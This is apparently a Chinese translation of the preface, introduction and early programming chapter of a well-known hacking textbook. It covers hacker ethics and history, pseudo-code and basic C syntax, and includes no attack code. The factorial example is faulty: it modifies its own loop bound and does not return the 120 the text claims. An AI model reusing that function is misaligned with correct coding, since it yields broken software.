黑客之利用的艺术第二版-全-

黑客之利用的艺术第二版（全）

原文：Hacking the art of exploitation, 2nd

译者：飞龙

协议：CC BY-NC-SA 4.0

前言

本书的目标是向每个人分享黑客技术的艺术。理解黑客技术往往很困难，因为它需要广泛和深入的知识。许多黑客教材似乎很神秘且令人困惑，仅仅是因为缺乏一些先决教育中的几个知识点。本版的《黑客：利用的艺术》通过提供从编程到机器代码再到利用的完整图景，使黑客的世界更加易于接近。此外，本版还包含一个基于 Ubuntu Linux 的可启动 LiveCD，可以在任何带有x86 处理器的计算机上使用，无需修改计算机现有的操作系统。这张 CD 包含了书中的所有源代码，并提供了一个你可以用来跟随书中的示例和沿途进行实验的开发和利用环境。

第 0x100 章。引言

破译这个概念可能会让人联想到电子破坏、间谍活动、染发和身体穿孔等夸张的形象。大多数人将黑客行为与违法联系起来，并认为从事黑客活动的人都是罪犯。诚然，确实有使用黑客技术违法的人，但黑客行为实际上并非如此。事实上，黑客行为更多的是关于遵守法律而非违反法律。黑客的本质在于发现给定情境中法律和特性的未预期或被忽视的用途，然后以新颖和创造性的方式应用它们来解决任何问题。

以下数学问题阐述了黑客的本质：

使用数字 1、3、4 和 6，通过四种基本数学运算（加法、减法、乘法和除法）正好得到 24。每个数字必须使用一次，并且可以定义运算顺序；例如，3 * (4 + 6) + 1 = 31 是有效的，尽管它是错误的，因为它没有得到 24。

这个问题的规则定义明确且简单，但答案却让许多人感到困惑。就像本书最后一页所示的这个问题的解决方案一样，黑客解决方案遵循系统的规则，但以反直觉的方式使用这些规则。这赋予了黑客优势，使他们能够以那些受限于传统思维和方法的人无法想象的方式解决问题。

自从计算机的幼年期开始，黑客们就富有创意地解决问题。在 20 世纪 50 年代末，麻省理工学院的模型铁路俱乐部收到了一批零件的捐赠，主要是旧电话设备。俱乐部的成员使用这些设备搭建了一个复杂的系统，允许多个操作员通过拨打电话到适当的区域来控制轨道的不同部分。他们将这种对电话设备的创新使用称为“黑客”；许多人认为这个团体是原始黑客。该团体后来转向为像 IBM 704 和 TX-0 这样的早期计算机编写穿孔卡片和纸带程序。当其他人满足于编写仅解决问题的程序时，早期的黑客们着迷于编写解决问题的程序“好”。一个新程序如果能以相同的结果替代现有的程序，但使用的穿孔卡片更少，就被认为更好，尽管它做了同样的事情。关键的区别在于程序实现结果的方式——优雅。

能够减少程序所需的穿孔卡片数量显示了在计算机上的艺术掌握。一张精心制作的桌子可以像牛奶箱一样容纳花瓶，但一个看起来肯定比另一个好得多。早期的黑客证明了技术问题可以有艺术解决方案，因此他们把编程从一项单纯的工程任务转变为一种艺术形式。

与许多其他艺术形式一样，黑客行为常常被误解。少数理解它的人形成了一个非正式的亚文化群体，他们始终专注于学习和掌握自己的艺术。他们认为信息应该是自由的，任何阻碍这种自由的东西都应该被绕过。这些障碍包括权威人物、大学课程的官僚主义和歧视。在以毕业为导向的学生海洋中，这个非官方的黑客群体挑战了传统目标，转而追求知识本身。这种不断学习和探索的驱动力甚至超越了由歧视划定的传统界限，这在麻省理工学院模型铁路俱乐部接受 12 岁的彼得·德奇时表现得尤为明显，当时他展示了他在 TX-0 上的知识和他学习的愿望。年龄、种族、性别、外貌、学术学位和社会地位并不是判断他人价值的主要标准——不是因为追求平等，而是因为希望推动新兴黑客艺术的进步。

最初的黑客们在传统的枯燥科学——数学和电子学中找到了辉煌和优雅。他们将编程视为一种艺术形式，将计算机视为这种艺术的工具。他们想要剖析和理解，并不是为了使艺术活动变得神秘，而仅仅是为了更好地欣赏它们。这些以知识为驱动的价值观最终被称为“黑客伦理”：对逻辑作为一种艺术形式的欣赏，以及对信息自由流动的促进，超越传统的界限和限制，以达到更好地理解世界的简单目标。这并非一种新的文化趋势；古希腊的毕达哥拉斯学派就有类似的伦理和亚文化，尽管他们没有拥有计算机。他们看到了数学中的美，并发现了几何学中的许多核心概念。这种对知识的渴望及其有益的副产品将继续贯穿历史，从毕达哥拉斯学派到阿达·洛芙莱斯，再到艾伦·图灵，再到麻省理工学院模型铁路俱乐部的黑客们。像理查德·斯托尔曼和史蒂夫·沃兹尼亚克这样的现代黑客继续着黑客的遗产，为我们带来了现代操作系统、编程语言、个人电脑以及我们每天使用的许多其他技术。

如何区分那些带来科技进步奇迹的好黑客和那些窃取我们信用卡号码的坏黑客呢？术语“cracker”被创造出来以区分坏黑客和好黑客。记者们被告知，crackers 应该是坏人，而 hackers 是好人。黑客们忠于黑客伦理，而 crackers 只对违法和快速赚钱感兴趣。由于 crackers 只是简单地利用黑客编写的工具和脚本，而不理解它们是如何工作的，因此被认为比精英黑客的才能要少得多。Cracker原本是用来指代任何用计算机进行不道德行为的人——盗版软件、破坏网站，最糟糕的是，不理解他们在做什么。但如今，几乎没有人使用这个术语。

这个术语不受欢迎可能是因为它的词源令人困惑——cracker最初描述的是破解软件版权和逆向工程版权保护方案的人。它目前的不受欢迎可能仅仅是因为它有两个含糊不清的新定义：一群使用计算机进行非法活动的人或相对不太熟练的黑客。很少有技术记者觉得有必要使用大多数读者都不熟悉的术语。相比之下，大多数人都能意识到与hacker一词相关的神秘和技能，因此对于记者来说，使用hacker这个术语的决定是容易的。同样，术语script kiddie有时也用来指代 crackers，但它并没有像神秘的hacker那样有吸引力。有些人仍然会争论黑客和 crackers 之间有一条明显的界限，但我相信，任何拥有黑客精神的人都是黑客，尽管他们可能违反了法律。

当前限制密码学和密码学研究的相关法律进一步模糊了黑客和破解者的界限。2001 年，普林斯顿大学的 Edward Felten 教授及其研究团队即将发表一篇论文，讨论各种数字水印方案的弱点。这篇论文是对 SDMI（Secure Digital Music Initiative）在 SDMI 公共挑战中提出的挑战的回应，该挑战鼓励公众尝试破解这些水印方案。然而，在 Felten 及其团队能够发表这篇论文之前，他们遭到了 SDMI 基金会和美国录音工业协会（RIAA）的威胁。1998 年的《数字千年版权法》（DMCA）规定，讨论或提供可能被用于绕过行业消费者控制的技术是非法的。同样的法律被用来对付俄罗斯计算机程序员和黑客 Dmitry Sklyarov。他编写了软件来绕过 Adobe 软件中过于简单的加密，并在美国的一个黑客大会上展示了他的发现。FBI 介入并逮捕了他，导致了一场漫长的法律斗争。根据该法律，行业消费者控制的复杂性并不重要——如果它被用作行业消费者控制，那么逆向工程或甚至讨论猪拉丁语都将被视为技术上的非法行为。现在谁是黑客，谁是破解者？当法律似乎干涉言论自由时，那些敢于直言的人突然变成了坏人吗？我相信黑客精神超越了政府法律，而不是由它们来定义。

核物理和生物化学科学可以用来杀人，但它们也为我们提供了重大的科学进步和现代医学。知识本身并无好坏之分；道德在于知识的运用。即使我们愿意，我们也无法压制物质转化为能量的知识或阻止社会技术的持续进步。同样，黑客精神永远不会停止，也不会轻易被分类或剖析。黑客将不断推动知识和可接受行为的极限，迫使我们进一步探索。

这部分动力导致了一个最终有益的通过攻击黑客和防御黑客之间的竞争而产生的安全协同进化。正如快速的长颈鹿适应了被猎豹追逐，而猎豹通过追逐长颈鹿变得更加强壮一样，黑客之间的竞争为计算机用户提供了更好、更强大的安全，以及更复杂和高级的攻击技术。入侵检测系统（IDSs）的引入和进步是这个协同进化过程的典型例子。防御黑客创建 IDS 来增强他们的武器库，而攻击黑客则开发 IDS 规避技术，这些技术最终在更大、更好的 IDS 产品中得到补偿。这种互动的净结果是积极的，因为它产生了更聪明的人、改进的安全、更稳定的软件、创新的解决问题的技术，甚至是一个新的经济体系。

这本书的目的是教你关于黑客精神的真正含义。我们将回顾从过去到现在的各种黑客技术，剖析它们，以了解它们是如何和为什么工作的。本书附带一个可启动的 LiveCD，其中包含本书中使用的所有源代码以及预配置的 Linux 环境。探索和创新对于黑客艺术至关重要，所以这张 CD 将让你跟随并自己进行实验。唯一的要求是x86 处理器，这是所有 Microsoft Windows 机器和较新的 Macintosh 电脑所使用的——只需插入 CD 并重新启动。这个替代的 Linux 环境不会干扰你的现有操作系统，所以当你完成时，只需重新启动并取出 CD。这样，你将获得对黑客的动手理解和欣赏，这可能会激发你改进现有技术，甚至发明新的技术。希望这本书能激发你内心的好奇黑客本性，并促使你以某种方式为黑客艺术做出贡献，无论你选择站在哪一边。

第 0x200 章。编程

黑客这个词既指编写代码的人，也指利用它的人。尽管这两个黑客群体有不同的最终目标，但两组都使用类似的问题解决技术。由于理解编程有助于那些利用它的人，而理解利用有助于那些编程的人，许多黑客都两者兼顾。在编写优雅代码的技术和利用程序的技术中，都发现了有趣的黑客技巧。黑客实际上只是找到对问题的一种巧妙且反直觉的解决方案的行为。

在程序漏洞中发现的黑客攻击通常使用计算机的规则以从未打算过的方式绕过安全措施。编程黑客在这一点上相似，它们也以新的和创造性的方式使用计算机的规则，但最终目标是效率或更小的源代码，而不一定是安全妥协。实际上，有无限多的程序可以编写来完成任何给定的任务，但其中大多数解决方案都是不必要的大、复杂和杂乱。剩下的少数解决方案则是小、高效和整洁的。具有这些品质的程序被称为优雅，而倾向于导致这种效率的巧妙和创造性的解决方案被称为黑客。编程两边的黑客都欣赏优雅代码的美丽和巧妙黑客的独创性。

在商业界，人们更重视快速生成功能代码，而不是实现巧妙黑客和优雅。由于计算能力和内存的指数级增长，在处理具有千兆赫兹处理周期和千兆字节内存的现代计算机时，额外花费五个小时来创建稍微快一些和更高效的代码在商业上是没有意义的。尽管时间和内存优化对除了最复杂的用户之外的所有用户来说都是不言而喻的，但新功能是可销售的。当底线是金钱时，在优化上花费时间进行巧妙黑客攻击是没有意义的。

真正欣赏编程优雅之处的是黑客们：这些是电脑爱好者，他们的最终目标不是盈利，而是从他们的老式 Commodore 64 中榨取每一丝可能的功能，需要编写微小而惊人的代码以穿过狭窄的安全缝隙的漏洞制造者，以及任何其他欣赏追求和挑战找到最佳解决方案的人。这些人会对编程感到兴奋，并真正欣赏优雅代码的美丽或巧妙黑客的独创性。由于理解编程是理解程序如何被利用的先决条件，因此编程是一个自然的起点。

什么是编程？

编程是一个非常自然和直观的概念。程序不过是一系列用特定语言编写的语句。程序无处不在，甚至世界上的技术恐惧者每天都在使用程序。驾驶指示、烹饪食谱、足球战术和 DNA 都是程序的类型。一个典型的驾驶指示程序可能看起来像这样：

Start out down Main Street headed east. Continue on Main Street until you see
a church on your right. If the street is blocked because of construction, turn
right there at 15th Street, turn left on Pine Street, and then turn right on
16th Street. Otherwise, you can just continue and make a right on 16th Street.
Continue on 16th Street, and turn left onto Destination Road. Drive straight
down Destination Road for 5 miles, and then you'll see the house on the right.
The address is 743 Destination Road.

任何懂英语的人都能理解并遵循这些驾驶指示，因为它们是用英语写的。诚然，它们并不优雅，但每个指令都很清晰，易于理解，至少对于阅读英语的人来说是这样的。

但计算机本身并不理解英语；它只理解机器语言。要指示计算机做某事，指令必须用它的语言编写。然而，机器语言是晦涩难懂的，难以操作——它由原始的比特和字节组成，并且因架构而异。要为 Intel x86 处理器编写机器语言的程序，你必须找出每个指令的值，每个指令如何交互，以及无数的底层细节。这样的编程既费力又繁琐，当然不是直观的。

要克服编写机器语言的复杂性，需要一个翻译器。汇编器是机器语言翻译器的一种形式——它是一个将汇编语言翻译成机器可读代码的程序。汇编语言比机器语言更易于理解，因为它使用不同的指令和变量名，而不是仅仅使用数字。然而，汇编语言仍然离直观性很远。指令名非常晦涩，且语言是针对特定架构的。正如 Intel x86 处理器的机器语言与 Sparc 处理器的机器语言不同一样，x86 汇编语言与 Sparc 汇编语言也不同。使用某一处理器架构编写的汇编语言程序在另一处理器架构上无法运行。如果程序是用x86 汇编语言编写的，它必须重写以在 Sparc 架构上运行。此外，为了有效地编写汇编语言程序，你仍然需要了解你正在编写的处理器架构的许多底层细节。

这些问题可以通过另一种称为编译器的翻译器来解决。编译器将高级语言转换为机器语言。高级语言比汇编语言更直观，并且可以转换为针对不同处理器架构的许多不同类型的机器语言。这意味着如果程序是用高级语言编写的，那么程序只需要编写一次；相同的程序代码可以被编译成适用于各种特定架构的机器语言。C、C++和 Fortran 都是高级语言的例子。用高级语言编写的程序比汇编语言或机器语言更易于阅读，更像英语，但它仍然必须遵循非常严格的关于指令措辞的规则，否则编译器将无法理解它。

Pseudo-code

程序员还有一种编程语言的形态，称为伪代码。伪代码只是用类似于高级语言的通用结构排列的英语。它不被编译器、汇编器或任何计算机理解，但它是一种程序员安排指令的有用方式。伪代码没有明确的定义；事实上，大多数人写的伪代码略有不同。它有点像是英语和像 C 这样的高级编程语言之间的模糊的缺失环节。伪代码是介绍通用编程概念的绝佳方式。

控制结构

没有控制结构，程序就只是一系列按顺序执行的指令。这对于非常简单的程序来说是可以的，但大多数程序，如驾驶指南示例，并不那么简单。驾驶指南中包含了诸如“继续沿 Main Street 行驶，直到你看到右手边的教堂”和“如果街道因施工而堵塞”之类的语句……这些语句被称为控制结构，它们改变了程序执行流程，从简单的顺序执行转变为更复杂、更有用的流程。

If-Then-Else

在我们的驾驶指南中，Main Street 可能会在施工中。如果是这样，就需要一套特殊的指令来处理这种情况。否则，应遵循原始的指令集。这些特殊的情况可以通过程序中的最自然的控制结构之一来处理：if-then-else 结构。一般来说，它看起来像这样：

If *`(condition) then {   Set of instructions to execute if the condition is met;`*
}
Else
{
  *`Set of instruction to execute if the condition is not met; }`*

对于这本书，我们将使用类似 C 语言的伪代码，因此每条指令都将以分号结束，指令集将通过花括号和缩进来分组。前面提到的驾驶指南的 if-then-else 伪代码结构可能看起来像这样：

Drive down Main Street;
If (street is blocked)
{
  Turn right on 15th Street;
  Turn left on Pine Street;
  Turn right on 16th Street;
}
Else
{
  Turn right on 16th Street;
}

每条指令都在单独的一行上，各种条件指令集被大括号包围并缩进以提高可读性。在 C 语言和许多其他编程语言中，then关键字是隐含的，因此省略了，所以在前面的伪代码中也没有包含。

当然，其他语言在它们的语法中需要then关键字——例如 BASIC、Fortran 和 Pascal。这些编程语言中的语法差异只是表面现象；底层结构仍然是相同的。一旦程序员理解了这些语言试图传达的概念，学习各种语法变体就相对简单。由于本书后面的部分将使用 C 语言，所以本书中使用的伪代码将遵循 C 语言类似的语法，但请记住，伪代码可以有多种形式。

C 语言类似语法中另一个常见的规则是，当由大括号包围的指令集只包含一个指令时，大括号是可选的。为了提高可读性，仍然建议缩进这些指令，但这在语法上不是必需的。根据这个规则，之前的驾驶指南可以被重写为等价的伪代码：

Drive down Main Street;
If (street is blocked)
{
  Turn right on 15th Street;
  Turn left on Pine Street;
  Turn right on 16th Street;
}
Else
  Turn right on 16th Street;

这条关于指令集的规则适用于本书中提到的所有控制结构，并且该规则本身可以用伪代码来描述。

If (there is only one instruction in a set of instructions)
  The use of curly braces to group the instructions is optional;
Else
{
  The use of curly braces is necessary;
  Since there must be a logical way to group these instructions;
}

语法本身的描述也可以被视为一个简单的程序。if-then-else 有各种变体，例如 select/case 语句，但逻辑基本上是相同的：如果发生这种情况就做这些事情，否则做其他事情（这可能包括更多的 if-then 语句）。

While/Until Loops

另一个基本的编程概念是 while 控制结构，它是一种循环。程序员经常希望多次执行一组指令。程序可以通过循环来完成这个任务，但这需要一组条件来告诉它何时停止循环，否则它将无限期地继续。一个while 循环告诉在条件为真时循环执行以下指令集。一个简单的饥饿鼠标程序可能看起来像这样：

While (you are hungry)
{
  Find some food;
  Eat the food;
}

在 while 语句之后的两个指令集将会在鼠标仍然饥饿的情况下重复执行。鼠标每次找到的食物量可能从一小块面包屑到一整条面包不等。同样，while 语句中的指令集执行次数取决于鼠标找到的食物量。

while 循环的另一种变体是 until 循环，这种语法在编程语言 Perl 中可用（C 语言不使用这种语法）。一个until 循环实际上是一个条件语句反转的 while 循环。使用 until 循环的相同鼠标程序可能是这样的：

Until (you are not hungry)
{
  Find some food;
  Eat the food;
}

从逻辑上讲，任何类似 until 的语句都可以转换成 while 循环。之前的驾驶指示中包含有Continue on Main Street until you see a church on your right（继续在主街上行驶，直到你看到右边的教堂）这样的语句。通过简单地反转条件，可以轻松地将其转换为标准的 while 循环。

While (there is not a church on the right)
   Drive down Main Street;

For 循环

另一种循环控制结构是for 循环。这通常用于程序员想要循环一定次数的情况。例如，Drive straight down Destination Road for 5 miles（直行下目的地道路 5 英里）可以转换为一个类似以下的 for 循环：

For (5 iterations)
  Drive straight for 1 mile;

实际上，for 循环只是一个带有计数器的 while 循环。同样的语句可以写成如下形式：

Set the counter to 0;
While (the counter is less than 5)
{
  Drive straight for 1 mile;
  Add 1 to the counter;
}

C 样式的伪代码语法使得 for 循环的这种特性更加明显：

For (i=0; i<5; i++)
  Drive straight for 1 mile;

在这种情况下，计数器被称为i，for 语句被分成三个部分，由分号分隔。第一部分声明计数器并将其设置为初始值，在这种情况下是 0。第二部分类似于使用计数器的 while 语句：While计数器满足这个条件，继续循环。第三部分和最后一部分描述了在每次迭代期间应该对计数器执行什么操作。在这种情况下，i++是一个简写方式，表示将计数器 i 的值加 1。

使用所有的控制结构，什么是编程？中的驾驶指示可以转换成类似以下的 C 样式的伪代码：

Begin going East on Main Street;
While (there is not a church on the right)
  Drive down Main Street;
If (street is blocked)
{
  Turn right on 15th Street;
  Turn left on Pine Street;
  Turn right on 16th Street;
}
Else
  Turn right on 16th Street;
Turn left on Destination Road;
For (i=0; i<5; i++)
  Drive straight for 1 mile;
Stop at 743 Destination Road;

更基本的编程概念

在接下来的章节中，将介绍更多通用的编程概念。这些概念在许多编程语言中使用，只有一些语法上的差异。在介绍这些概念时，我将使用 C 样式的语法将它们整合到伪代码示例中。最终，伪代码应该看起来非常类似于 C 代码。

变量

在 for 循环中使用的计数器实际上是一种变量类型。变量可以简单地理解为持有可变数据的对象——因此得名。也存在一些不改变的变量，这些变量被称为常量。回到驾驶的例子，汽车的速度就是一个变量，而汽车的颜色则是一个常量。在伪代码中，变量是简单的抽象概念，但在 C（以及许多其他语言）中，变量在使用之前必须声明并指定其类型。这是因为 C 程序最终会被编译成可执行程序。就像烹饪食谱在给出指令之前列出所有必需的原料一样，变量声明允许你在进入程序的核心部分之前做好准备。最终，所有变量都存储在某个地方的内存中，它们的声明允许编译器更有效地组织这些内存。尽管如此，尽管有所有变量类型的声明，但本质上一切都是内存。

在 C 语言中，每个变量都被赋予一个类型，该类型描述了要存储在该变量中的信息。最常见的类型包括 int（整数值）、float（十进制浮点值）和 char（单个字符值）。变量可以通过在列出变量之前使用这些关键字来声明，如下所示。

int a, b;
float k;
char z;

变量 a 和 b 现在定义为整数，k 可以接受浮点值（如 3.14），而 z 预期将包含字符值，如 A 或 w。变量可以在声明时或之后任何时间使用等号运算符赋值。

int a = 13, b;
float k;
char z = 'A';

k = 3.14;
z = 'w';
b = a + 5;

执行以下指令后，变量 a 将包含 13 的值，k 将包含数字 3.14，z 将包含字符 w，而 b 将包含值 18，因为 13 加 5 等于 18。变量只是记住值的一种方式；然而，在 C 语言中，你必须首先声明每个变量的类型。

| 算术运算符 |

语句 b = a + 7 是一个非常简单的算术运算符的例子。在 C 语言中，以下符号用于各种算术运算。

前四个操作应该看起来很熟悉。模数减少可能是一个新概念，但实际上它只是除法后的余数。如果 a 是 13，那么 13 除以 5 等于 2，余数为 3，这意味着 a % 5 = 3。另外，由于变量 a 和 b 是整数，所以 b = a / 5 的语句将导致 2 的整数值存储在 b 中，因为那是它的整数部分。为了保留更准确的答案 2.6，必须使用浮点变量。

操作	符号	示例
加法	+	`b = a + 5`
减法	-	`b = a - 5`
乘法	*	`b = a * 5`
除法	/	`b = a / 5`
模数减少	%	`b = a % 5`

要使程序使用这些概念，你必须使用它的语言。C 语言还提供了这些算术运算的几种简写形式。其中之一在前面提到过，并且在 for 循环中常用。

完整表达式	简写	说明
`i = i + 1`	`i++ 或 ++i`	将 1 加到变量上。
`i = i - 1`	`i-- 或 --i`	从变量中减去 1。

这些简写表达式可以与其他算术运算结合，产生更复杂的表达式。这就是 i++ 和 ++i 之间的区别变得明显的地方。第一个表达式意味着在 评估算术运算后 将 i 的值增加 1，而第二个表达式意味着在 评估算术运算前 将 i 的值增加 1。以下示例将有助于澄清。

int a, b;
a = 5;
b = a++ * 6;

在这一组指令执行完毕后，变量 b 将包含 30，而 a 将包含 6，因为 b = a++ * 6; 的简写相当于以下语句：

b = a * 6;
a = a + 1;

然而，如果使用指令 b = ++a * 6;，则对 a 的加法顺序会改变，从而导致以下等效指令：

a = a + 1;
b = a * 6;

由于顺序已改变，在这种情况下 b 将包含 36，而 a 仍然包含 6。

在程序中，变量经常需要就地修改。例如，你可能需要向一个变量添加一个任意的值，比如 12，并将结果直接存储在那个变量中（例如，i = i + 12）。这种情况经常发生，因此也存在简写形式。

完整表达式	简写	说明
`i = i + 12`	`i+=12`	向变量添加一些值。
`i = i - 12`	`i-=12`	从变量中减去一些值。
`i = i * 12`	`i*=12`	将一些值乘以变量。
`i = i / 12`	`i/=12`	从变量中除以一些值。

比较运算符

变量经常用于之前解释的控制结构的条件语句中。这些条件语句基于某种比较。在 C 语言中，这些比较运算符使用一种在许多编程语言中相当常见的简写语法。

条件	符号	示例
小于	<	`(a < b)`
大于	>	`(a > b)`
小于或等于	<=	`(a <= b)`
大于或等于	>=	`(a >= b)`
等于	==	`(a == b)`
不等于	!=	`(a != b)`

大多数这些运算符都是不言自明的；然而，请注意，等于的简写使用双等号。这是一个重要的区别，因为双等号用于测试等价性，而单等号用于将值赋给变量。语句 a = 7 的意思是 将值 7 放入变量 a 中，而 a == 7 的意思是 检查变量 a 是否等于 7。（一些编程语言如 Pascal 实际上使用 := 来进行变量赋值以消除视觉上的混淆。）此外，请注意，感叹号通常表示非。这个符号可以单独使用来反转任何表达式。

!(a < b)    is equivalent to    (a >= b)

这些比较运算符也可以通过 OR 和 AND 的简写形式连接在一起。

逻辑	符号	示例
OR	\|\|	`((a < b) \|\| (a < c))`
AND	&&	`((a < b) && !(a < c))`

由两个较小的条件通过 OR 逻辑连接的示例语句将在 a 小于 b 或 a 小于 c 时触发为真。同样，由两个较小的比较通过 AND 逻辑连接的示例语句将在 a 小于 b 且 a 不小于 c 时触发为真。这些语句应该用括号分组，并且可以包含许多不同的变体。

许多事情都可以归结为变量、比较运算符和控制结构。回到鼠标寻找食物的例子，饥饿可以翻译成一个布尔值 true/false 变量。自然地，1 表示 true，0 表示 false。

While (hungry == 1)
{
  Find some food;
  Eat the food;
}

这是由程序员和黑客经常使用的一种简写。C 语言实际上没有布尔运算符，所以任何非零值都被认为是真的，如果语句包含 0，则该语句被认为是假的。实际上，比较运算符会在比较为真时返回 1，在比较为假时返回 0。检查变量 hungry 是否等于 1，如果 hungry 等于 1，则返回 1，如果 hungry 等于 0，则返回 0。由于程序只使用这两种情况，比较运算符可以完全省略。

While (hungry)
{
  Find some food;
  Eat the food;
}

一个更智能的鼠标程序，具有更多输入，展示了比较运算符如何与变量结合使用。

While ((hungry) && !(cat_present))
{
  Find some food;
  If(!(food_is_on_a_mousetrap))
    Eat the food;
}

这个例子假设还有描述猫的存在和食物位置的变量，值为 1 表示真，值为 0 表示假。只需记住，任何非零值都被认为是真的，而 0 的值被认为是假的。

函数

有时候程序员会知道他需要多次使用一组指令。这些指令可以被组合成一个更小的子程序，称为函数。在其他语言中，函数被称为子程序或过程。例如，转向汽车的动作实际上由许多更小的指令组成：打开适当的转向灯，减速，检查来车，转动方向盘到适当的方向，等等。本章开头的驾驶指示需要很多转弯；然而，列出每个转弯的每一个小指令将会很繁琐（并且可读性较差）。你可以将变量作为参数传递给函数，以修改函数的操作方式。在这种情况下，函数接收转弯的方向作为参数。

Function Turn(variable_direction)
{
  Activate the variable_direction blinker;
  Slow down;
  Check for oncoming traffic;
  while(there is oncoming traffic)
  {
    Stop;
    Watch for oncoming traffic;
  }
  Turn the steering wheel to the variable_direction;
  while(turn is not complete)
  {
    if(speed < 5 mph)
      Accelerate;
  }
  Turn the steering wheel back to the original position;
  Turn off the variable_direction blinker;
}

这个函数描述了完成转弯所需的所有指令。当一个了解这个函数的程序需要转弯时，它只需调用这个函数。当函数被调用时，其中的指令会根据传递给它的参数执行；之后，执行会返回到函数调用后的程序位置。可以向这个函数传递左转或右转，这将导致函数向该方向转弯。

在 C 语言中，默认情况下，函数可以向调用者返回一个值。对于那些熟悉数学函数的人来说，这完全合理。想象一个计算一个数字阶乘的函数——自然地，它返回结果。

在 C 语言中，函数不是用“函数”关键字标记的；相反，它们通过返回变量的数据类型来声明。这种格式看起来非常类似于变量声明。如果一个函数旨在返回一个整数（可能是一个计算某个数字 x 的阶乘的函数），该函数可能看起来像这样：

int factorial(int x)
{
  int i;
  for(i=1; i < x; i++)
    x *= i;
  return x;
}

此函数被声明为整数类型，因为它将 1 到 x 的每个值相乘并返回结果，这是一个整数。函数末尾的返回语句将变量 x 的内容传递回并结束函数。然后，这个阶乘函数可以像整数变量一样在任何了解它的程序的主要部分中使用。

int a=5, b;
b = factorial(a);

在这个简短程序结束时，变量 b 将包含 120，因为阶乘函数将使用 5 作为参数并返回 120。

在 C 中，编译器在可以使用函数之前必须“知道”它们。这可以通过在程序后面使用之前简单地编写整个函数来实现，或者通过使用函数原型。函数原型只是告诉编译器预期一个具有此名称、此返回数据类型以及这些数据类型作为其功能参数的函数。实际函数可以位于程序末尾附近，但可以在任何其他地方使用，因为编译器已经知道它了。factorial() 函数的函数原型示例可能看起来像这样：

int factorial(int);

通常，函数原型位于程序的开头附近。在原型中实际上不需要定义任何变量名称，因为这是在实际函数中完成的。编译器所关心的是函数的名称、其返回数据类型以及其功能参数的数据类型。

如果一个函数没有要返回的值，它应该被声明为 void，就像我之前用作示例的 turn() 函数一样。然而，turn() 函数还没有捕获我们所需的全部转向功能。方向指示中的每个转向都有方向和街道名称。这意味着转向函数应该有两个变量：转向的方向和要转向的街道。这使转向功能变得复杂，因为必须在转向之前找到正确的街道。下面列出了一个使用正确 C 语法伪代码的更完整的转向函数。

void turn(variable_direction, target_street_name)
{
  Look for a street sign;
  current_intersection_name = read street sign name;
  while(current_intersection_name != target_street_name)
  {
    Look for another street sign;
    current_intersection_name = read street sign name;
  }

  Activate the variable_direction blinker;
  Slow down;
  Check for oncoming traffic;
  while(there is oncoming traffic)
  {
    Stop;
    Watch for oncoming traffic;
  }
  Turn the steering wheel to the variable_direction;
  while(turn is not complete)
  {
    if(speed < 5 mph)
      Accelerate;
  }
  Turn the steering wheel right back to the original position;
  Turn off the variable_direction blinker;
}

此函数包括一个部分，通过寻找路标、读取每个路标上的名称并将该名称存储在名为 current_intersection_name 的变量中来寻找合适的交叉点。它将继续寻找和读取路标，直到找到目标街道；在那个时刻，剩余的转向指令将被执行。现在可以将伪代码的转向指令更改为使用此转向函数。

Begin going East on Main Street;
while (there is not a church on the right)
   Drive down Main Street;
if (street is blocked)
{
  Turn(right, 15th Street);
  Turn(left, Pine Street);
  Turn(right, 16th Street);
}
else
  Turn(right, 16th Street);
Turn(left, Destination Road);
for (i=0; i<5; i++)
  Drive straight for 1 mile;
Stop at 743 Destination Road;

在伪代码中通常不常用函数，因为伪代码主要是程序员在编写可编译代码之前勾勒程序概念的一种方式。由于伪代码实际上不需要真正工作，所以不需要写出完整的函数——只需简单地写下“在这里做一些复杂的事情”就足够了。但在像 C 这样的编程语言中，函数被大量使用。C 的大部分实用性来自于被称为库的现有函数集合。

摸索实践

现在 C 的语法感觉更加熟悉，一些基本编程概念也已经解释清楚，实际上用 C 编程并不是一大步。C 编译器几乎适用于所有操作系统和处理器架构，但在这本书中，我们将专门使用 Linux 和基于x86 的处理器。Linux 是一个免费的操作系统，每个人都可以访问，基于x86 的处理器是地球上最受欢迎的消费级处理器。由于黑客精神实际上就是实验，所以如果你有一个 C 编译器来跟随，那可能最好不过了。

如果你的电脑有x86 处理器，这本书中包含了一个 Live CD，你可以用它来跟随。只需将 CD 放入驱动器，重新启动你的电脑。它将启动到一个 Linux 环境中，而不会修改你的现有操作系统。从这个 Linux 环境中，你可以跟随这本书，并自己进行实验。

让我们直接进入正题。第一个firstprog.c程序是一段简单的 C 代码，它将打印“Hello, world!” 10 次。

摸索实践

firstprog.c

#include <stdio.h>

int main()
{
  int i;
  for(i=0; i < 10; i++)       // Loop 10 times.
  {
    puts("Hello, world!\n");  // put the string to the output.
  }
  return 0;                   // Tell OS the program exited without errors.
}

C 程序的主要执行开始于名为main()的函数。任何跟在两个正斜杠（//）后面的文本都是注释，编译器会忽略它。

第一行可能有些令人困惑，但这只是 C 语法，告诉编译器包含一个名为stdio的标准输入/输出（I/O）库的头文件。当程序编译时，这个头文件会被添加到程序中。它位于/usr/include/stdio.h，它定义了标准 I/O 库中相应函数的几个常量和函数原型。由于main()函数使用了标准 I/O 库中的printf()函数，所以在使用之前需要一个printf()函数原型。这个函数原型（以及许多其他原型）包含在 stdio.h 头文件中。C 的很多力量来自于其可扩展性和库。其余的代码应该很容易理解，看起来也和之前的伪代码很相似。你可能甚至注意到有一组可以省略的大括号。这个程序将做什么应该很明显，但让我们使用 GCC 编译它并运行它，以确保一切正常。

GNU 编译器集合（GCC）是一个免费的 C 语言编译器，可以将 C 语言翻译成处理器可以理解的机器语言。输出的翻译是一个可执行二进制文件，默认情况下称为a.out。编译后的程序是否做了你想象中的事情？

reader@hacking:~/booksrc $ gcc firstprog.c
reader@hacking:~/booksrc $ ls -l a.out
-rwxr-xr-x 1 reader reader 6621 2007-09-06 22:16 a.out
reader@hacking:~/booksrc $ ./a.out
Hello, world!
Hello, world!
Hello, world!
Hello, world!
Hello, world!
Hello, world!
Hello, world!
Hello, world!
Hello, world!
Hello, world!
reader@hacking:~/booksrc $

整体图景

